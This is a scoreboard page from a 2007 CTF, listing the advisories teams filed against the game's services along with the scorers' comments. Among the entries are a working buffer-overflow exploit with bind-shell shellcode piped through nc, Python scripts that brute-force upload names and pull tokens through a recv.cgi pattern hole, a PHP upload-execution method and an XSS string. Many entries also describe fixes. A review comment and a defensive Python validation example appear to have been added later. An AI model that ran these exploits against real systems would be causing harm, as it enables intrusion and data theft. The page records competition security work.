HC's Capture the Flag site
Camp 07 CTF
Advisories
Reporting time (Unix epoch) | Team | Description | State | Points and comment |
---|---|---|---|---|
1186876864 | luckyluke | The SMTP client doesn't correctly implement SMTP - it doesn't wait for the server to reply to its requests | pending | |
1186876511 | InnovaDorf | LightTPD 1.4.12 has a vulnerability posted on several pages. As the net is down, I can't look them up right now... | rejected | [0] that is not one of our services and is fixed in updates of FreeBSD |
1186875752 | DrunkenSheeps | #!/bin/sh # # retserv exploit, binshell at 17664 # IP=$1 ADDRESS=$2 echo "trying $IP w/ address $ADDRESS" ( printf "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x61\xeb\x7e\x5f\xc6\x47\x08\x9a\x89\x47\ \x09\x89\x47\x0d\xc6\x47\x0d\x07\xc6\x47\x0f\xc3\x50\x53\x6a\x01\ \x6a\x02\x8d\x4f\x08\xff\xd1\x89\x47\x24\xb0\x68\x50\x6a\x10\xb3\x02\ \x66\x89\x5f\x10\xb3\x45\x66\x89\x5f\x12\x89\x57\x14\x8d\x5f\x10\x53\xff\x77\x24\xff\xd1\ \xb0\x6a\x50\x6a\x02\xff\x77\x24\xff\xd1\xb0\x1e\x50\x52\x52\xff\ \x77\x24\xff\xd1\x89\xc3\xb0\x5a\x50\x52\x53\xff\xd1\xb0\ \x5a\x50\x42\x52\x53\xff\xd1\xb0\x5a\x50\x42\x52\x53\xff\xd1\xb0\x3b\x31\xdb\x50\ \x88\x5f\x07\x53\x89\x7f\x10\x8d\x5f\x10\x53\ \x57\xff\xd1\xe8\x7d\xff\xff\xff/bin/sh\x90" ; \ perl -e 'print "A" x 901' ; printf "${ADDRESS}" ) \| nc $IP 1111 # eof. note: you must find out the base address of buf | accepted | [2] remote root is always nice |
1186874677 | InnovaDorf | kannx : using a negative or too high index causes an ArrayOutOfBoundsException in TransferCommand line 68 (in Account Dialog) | accepted | [2] ack |
1186872805 | InnovaDorf | Tool to determine the web server's time using a HEAD request to have a high chance to guess the timestamp in an uploaded file's name. --- 8< --------------- #!/usr/bin/env python # -*- coding: utf-8 -*- """Ask a Webserver for his current time.""" from __future__ import with_statement from contextlib import closing from datetime import datetime from optparse import OptionParser import socket if __name__ == '__main__': parser = OptionParser(usage='%prog <host> [port]') args = parser.parse_args()[1] try: host = args.pop() except IndexError: parser.print_help() parser.exit() try: port = int(args.pop()) except (IndexError, ValueError): port = 80 # Read HTTP HEAD response. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) with closing(s) as s: s.connect((host, port)) s.send('HEAD / HTTP/1.0\r\n\r\n') data = s.recv(1024) # Skip the first line with the HTTP method. lines = (line for line in data.split('\r\n')[1:] if line) # Create a mapping of the headers. headers = dict(line.split(': ') for line in lines) # Parse date/time. dt_str = headers['Date'] dt_obj = datetime.strptime( dt_str.rsplit(' ', 1)[0], '%a, %d %b %Y %H:%M:%S') print dt_str print dt_obj print dt_obj.strftime('%s') | accepted | [1] It's a vulnerability, but the timestamp doesn't get you anywhere |
1186872685 | InnovaDorf | scorebot doesn't like mixed bash/awk scripts... | rejected | [0] please provide an example by uploading it to your own webserver and giving us a URL to it |
1186872016 | InnovaDorf | Exploit for the guessable timestamp vulnerability in the PHP upload. --- 8< --------------- #!/usr/bin/env python """Try to access an uploaded file by brute-forcing the timestamp contained in its name.""" from optparse import OptionParser from urllib2 import urlopen, HTTPError if __name__ == '__main__': parser = OptionParser(usage='%prog <url> <start> <stop>') try: url, start, stop = parser.parse_args()[1] start = int(start) stop = int(stop) except ValueError: parser.print_help() parser.exit() for i in range(start, stop): try: xurl = url % i print urlopen(xurl).read() except HTTPError, e: #print e pass | accepted | [0] guessing the timestamp is not enough |
1186871855 | InnovaDorf | Fix for the `ID=.*` hole in `recv.cgi`. --- 8< --------------- echo "$1" \| grep '^[[:xdigit:]]*$' && \ | accepted | [1] thx |
1186871570 | InnovaDorf | Exploit for the `ID=.*` hole in `recv.cgi`. --- 8< --------------- #!/usr/bin/env python """Fetch the last well-formed token in a website.""" from optparse import OptionParser from sys import exit from urllib2 import urlopen, URLError if __name__ == '__main__': parser = OptionParser(usage='%prog <host>') args = parser.parse_args()[1] if len(args) != 1: parser.print_help() parser.exit() # Read data via HTTP. url = 'http://%s:31337/recv.cgi?ID=.*' % args[0] try: data = urlopen(url).read() except URLError, e: exit(str(e)) # Extract last token. last_token = None for line in data.split('\n'): if not line.startswith('daten: '): continue token = line[7:] if len(token) != 64: continue last_token = token if last_token is None: exit(1) print last_token | accepted | [1] thx |
1186871463 | LegionOfTheStaticDiscord | By passing ".*" as the ID to pocerws' recv.cgi it is possible to retrieve all texts. | accepted | [2] please provide an exploit or a fix too |
1186871168 | luckyluke | The retserver program is missing a directory traversal check in getmsg(). You can supply a msgid containing "../", thus reading files from the filesystem. Fix: at the beginning of getmsg() add: + if (strchr(msgid, '/')) + return; snprintf(filename, 1024, "%s/%s", MAILDIR, msgid); | accepted | [2] reading arbitrary files could be exploitable *hint* *hint* |
1186869787 | InnovaDorf | kannx: SetecFinanceBroker line 159. It is possible to pass a negative Amount to increase the balance (which is not very sensible for outgoing transfers). | accepted | [2] very nice |
1186869207 | luckyluke | The adlsmtp python script "deliver.py" allows exiting the mailbox dir and overwriting arbitrary files when using "../" in the receiver mail address. The bug can be fixed by adding 'if rcpt.find("/"): return' before this line: mail = open("%s/%s" % (mailpath, rcpt), 'a') | accepted | [2] good catch |
1186868135 | DrunkenSheeps | adlmailserver retserver main.c line 62-77 reported by ctf07_gopher: buffer overflow exploit possible, you can easily bind a shell on the remote server. Exploit coming as soon as our shellcode is working. | accepted | [2] right, awaiting your exploit |
1186867890 | DrunkenSheeps | scorebot: if supplying an advisory and entering a long text without returns (a very long string as report) it prints error 127 and submits an empty advisory | accepted | [0] Yeah, but this doesn't affect others, only yourself |
1186867811 | DrunkenSheeps | tarot2.erl allows storing files wherever you want. After a connection and the command "help me" you can just enter /tmp/foo and press return; it will store a file in /tmp/foo because it sets Key=Data where Data is the user input. To store the file, file_write(Key,Data) is used. So you get a file with the same content. | accepted | [2] yup -- I see you speak erlang |
1186867198 | InnovaDorf | Mail Service retserver/main.c: missing free(tmpfn); after strdup(). even better: use const char* directly: int tmpfile = mkstemp("/var/tmp/retserver.XX"); | accepted | [0] not security relevant |
1186865681 | InnovaDorf | the unused goph service has a memory leak when using the LS token. Attached patch should fix (at least) this:
diff -uNr goph.bak/goph.y goph/goph.y
--- goph.bak/goph.y Sat Aug 11 20:42:07 2007
+++ goph/goph.y Sat Aug 11 21:44:49 2007
@@ -25,7 +25,7 @@ start: RUN PARAM { runbin($1, $2); free($1); free($2); } | TEXT PARAM { printf("lklkl"); runnone($1); free($1); free($2); } - | LS { system("ls"); } + | LS { system("ls"); free($1); } ; | accepted | [2] nice find |
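Review bot: the added free($1) in the LS alternative is only safe if the lexer actually sets yylval to a freshly allocated string for the LS token; the lexer is not in the hunk, and if the LS rule never assigns yylval, $1 is whatever the previous PARAM token left there, which the RUN PARAM and TEXT PARAM actions above already free. Please either show the matching lexer change (e.g. `yylval = strdup(yytext)` in the LS rule) or, since a keyword token needs no semantic value, fix the leak by not allocating for LS at all. The `printf("lklkl")` in the TEXT PARAM alternative also reads like leftover debug output.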
1186865343 | InnovaDorf | PocerWS: Directory traversal possible. In line 39, there still exists a bug in the regexp. Although absolute paths are not possible anymore (see 1186854356) if properly fixed, directory traversal is still possible through using syntax like "/../../". As the location of the service is known, it is very easy using "/../../" to get to / in the FS. So everything is still runnable. | accepted | [2] accepted |
1186861151 | luckyluke | The password for the UNDB service is transferred in clear text over TCP. In addition, it is used as a GET parameter which is visible to the user and shoulder surfers through the browser URL line. Fix: change all forms from GET to POST. | rejected | [0] POST still transmits in plaintext. Unencrypted passwords are more of a transport-layer issue |
1186861129 | luckyluke | The files/ directory and authfile for the UNDB service are located in the www-root, which is not required for the service to work. Both entries should be moved outside of the www-root and the references in the php scripts should be changed. This example moves them one directory up: login_inc.php: s/"authfile"/"..\/authfile"/ list.php: s/"files"/"..\/files"/ upload.php: s/www\/files/files/ | accepted | [2] Placing that outside of the www-root is a good idea. Nice advisory including the suggestion of a fix |
1186861128 | Becksgold | It is possible to fill the hard disks of the server with rubbish until they are full, because the MAXSIZE of the uploaded file is stored in a hidden form field. This can be overridden with Firebug (e.g.). The MAXSIZE is not checked in recv.php. Several files are required to fill the HDDs. Possible solution: static checking in recv.php AND limit the number of files uploaded per IP etc. | accepted | [1] MAXSIZE is also filled by the PHP module. DoS is thus possible, but not very interesting. |
1186861091 | luckyluke | The UNDB application contains an authentication vulnerability: the user ID is read from a GET parameter instead of using the authentication database. This allows a legal user to impersonate another one by changing the id= value in the URL, thus getting access to the other user's flag. Fix: use check($country, $password) return value for $id in list.php, recv.php and upload.php (line 17 or 18) | accepted | [4] Good catch. Nice advisory. Right fix. |
1186861030 | luckyluke | The kannx service allows a password change through an insecure clear text connection. This should be changed to an SSL encrypted service or replaced by transferring only the hashed password / a challenge response mechanism. | accepted | [0] transport layer problem. feel free to replace for hackpoints. see http://10.255.1.3/kannx.py |
1186854356 | InnovaDorf | pocerws2.rb is exploitable because it allows execution of any script passed as URL path (using a double slash after the host:port). It just strips the "GET /" prefix but does not enforce any checks on which file with which extension/type or whatever should be executed. Although this is limited to scripts (no binaries), a malicious script introduced by an attacker (maybe using php upload) can then be executed. One can limit access to certain file types, but usually passing unfiltered arguments to a `system()` call and especially providing a service that offers an unsecured remote shell is a very bad and stupid idea. | accepted | [2] indeed |
1186854197 | InnovaDorf | Module undb: when creating user accounts, existing user accounts can be overwritten. | accepted | [2] good |
1186852179 | lamerville | sendmail is expected to be running, not starting up upon boot, fix rc.conf | rejected | [0] You may fix it for us ;-) |
1186852060 | DrunkenSheeps | undb service (webserver, php application) With http://x.x.x.x/upload.php u can upload any file. So u may upload php files and execute them on the server. Files will be created like this: $userId _ $timestampOfUpload _ $filename A quick fix would be to drop the extension of the file. On line 35 of recv.php add something like $partBeforePoint = explode('.',basename($_FILES['userfile']['name'])); $newName = $partBeforePoint[0]; Example: upload a file with the contents and the name foo.php: `<?php phpinfo (); ?>` u will get a file which is named like: 1_timestamp_foo.php in the files subdirectory... if u execute it u will have the php information or anything else u want to put in the script. | accepted | [3] good, but please mind your language |
1186851457 | InnovaDorf | Clear text HTTP GET is not much better using SSL - since they are clearly readable in the address location bar. | rejected | [0] That's not a vulnerability in the service |
1186851348 | LegionOfTheStaticDiscord | recv.php allows authenticated attackers to upload files which can be executed from remote. the script keeps the suffix of the uploaded file and moves it with some guessable prefix to the files directory. (recv.php 35-37) | accepted | [3] omg, that gets you a lot of points ;-) |
1186850034 | LegionOfTheStaticDiscord | The password for United Nations access is transported in clear text via HTTP GET parameters. | accepted | [1] you're right, using SSL is better |
1186849634 | LegionOfTheStaticDiscord | the syslog service is listening on udp port 514 for the outside by default. this can lead to all kinds of problems, disk space DoS, log file entry spoofing, etc. etc. | accepted | [2] ok |
1186849526 | LegionOfTheStaticDiscord | The United Nations password for user "test" is "foobar". | rejected | [0] use it to exploit, but advisories must be about implementation flaws |
1186849469 | LegionOfTheStaticDiscord | sendmail is running by default and listening on port 25. everybody knows sendmail is vulnerable, right? | rejected | [0] I didn't know :) |
1186849365 | LegionOfTheStaticDiscord | The authfile for the web app is publicly accessible. | accepted | [2] ok -- but they are hashed |
1186848715 | LegionOfTheStaticDiscord | The installed BIND version is prone to multiple DoS vulns. See http://security.freebsd.org/advisories/FreeBSD-SA-07:02.bind.asc | rejected | [0] bind is not running |
1186848692 | luckyluke | `<script type='text/javascript'>alert('owned by team 6');</script>` | rejected | [0] wtf |
1186848462 | luckyluke | it's running sendmail 1.8.3 | rejected | [0] wtf |
1186848421 | LegionOfTheStaticDiscord | FreeBSD 6.2-RELEASE's tcpdump is prone to a buffer overflow in the BGP parsing code See http://security.freebsd.org/advisories/FreeBSD-SA-07:06.tcpdump.asc | rejected | [0] tcpdump is not a service |
1186848418 | luckyluke | it's running freebsd 6.2 beta3 | accepted | [1] right |
1186848365 | DrunkenSheeps | freebsd :P | accepted | [2] right |
1186848335 | InnovaDorf | FreeBSD | rejected | [0] sorry, you weren't the fastest |
1186838089 | NotSoGoodButWantToLearn | proxyarp is enabled on the switches :) *.*.*.* lladdr 00:01:43:e4:b4:0a REACHABLE | accepted | [1] ok |
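The traversal advisories (retserver getmsg(), deliver.py), the `ID=.*` hole in recv.cgi and the kept extension in the UNDB upload all come down to the same mistake: an attacker-chosen name (msgid, rcpt, ID, uploaded filename) reaches a path or a pattern unchecked. The following is an added example in Python 3, not code from any of the CTF services or from the submitting teams; the base directories, the function names and the integer user id are assumptions for the demo. It keeps the intent of the accepted fixes (reject any `/`, hex-only IDs, no extension on stored uploads) and adds the checks a reviewer would want: the resolved path is confirmed to stay below the base directory, an empty ID is rejected, and a `str.find`-based check like the one in the deliver.py advisory is included only to make its behaviour testable, since `find` returns -1 (which is truthy) when nothing is found and 0 (falsy) when the slash is the first character.

```python
"""Name validation for the path/pattern bugs reported on this page.

Constructed demo, not code from any of the CTF services; MAILDIR and
UPLOAD_DIR are assumed values, the real ones are not on the page.
"""
import os
import re

MAILDIR = "/var/mail/retserver"   # assumed
UPLOAD_DIR = "/www/files"         # assumed

HEX_ID = re.compile(r"^[0-9A-Fa-f]+$")
SAFE_STEM = re.compile(r"[^0-9A-Za-z_-]")


def valid_id(value):
    """recv.cgi: an ID may contain only hex digits, so '.*' can never act as
    a pattern.  Unlike grep '^[[:xdigit:]]*$', the empty string is rejected."""
    return bool(HEX_ID.match(value))


def find_based_rejects(rcpt):
    """What `if rcpt.find("/"): return` actually decides: True means reject.
    Shown only to make the pitfall testable; do not use as a check."""
    return bool(rcpt.find("/"))


def safe_message_path(msgid, base=MAILDIR):
    """Return base/msgid if msgid cannot escape base, else None.

    The page's fix rejects any '/' (strchr(msgid, '/')); this also rejects
    '.', '..', NUL and backslashes, then re-checks the resolved path."""
    if not msgid or msgid in (".", "..") or "\x00" in msgid:
        return None
    if "/" in msgid or "\\" in msgid:
        return None
    path = os.path.normpath(os.path.join(base, msgid))
    if os.path.commonpath([base, path]) != base:
        return None
    return path


def safe_upload_name(user_id, timestamp, filename):
    """Build the UNDB-style <uid>_<ts>_<stem> name with path components and
    the extension removed and the stem restricted to [0-9A-Za-z_-], so an
    uploaded foo.php is stored without the suffix that maps it to PHP."""
    stem = os.path.basename(filename.replace("\\", "/")).split(".")[0]
    stem = SAFE_STEM.sub("_", stem) or "upload"
    return "%d_%d_%s" % (user_id, timestamp, stem)


if __name__ == "__main__":
    # Constructed inputs mirroring the advisories above.
    for msgid in ("msg1", "../../etc/passwd", ".."):
        print(repr(msgid), "->", safe_message_path(msgid))
    for rcpt in ("alice", "/etc/passwd"):
        print("find-based check rejects", repr(rcpt), "->", find_based_rejects(rcpt))
    print(valid_id("deadBEEF"), valid_id(".*"))
    print(safe_upload_name(1, 1186851348, "foo.php"))
```

Dropping the extension only removes extension-based handler mapping; the stored name stays as guessable as before, so the `id=` authorization fix above is what keeps one user's files from another.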
Reporting flags and advisories
To report flags and/or report advisories, telnet to , port 8080. Follow the instructions given there!
Last updated August 16 2007 15:54:57
Scoring system for the CC CAMP 07 CTF (C) 2007, Christian Esperer. hc at hcespererdotorg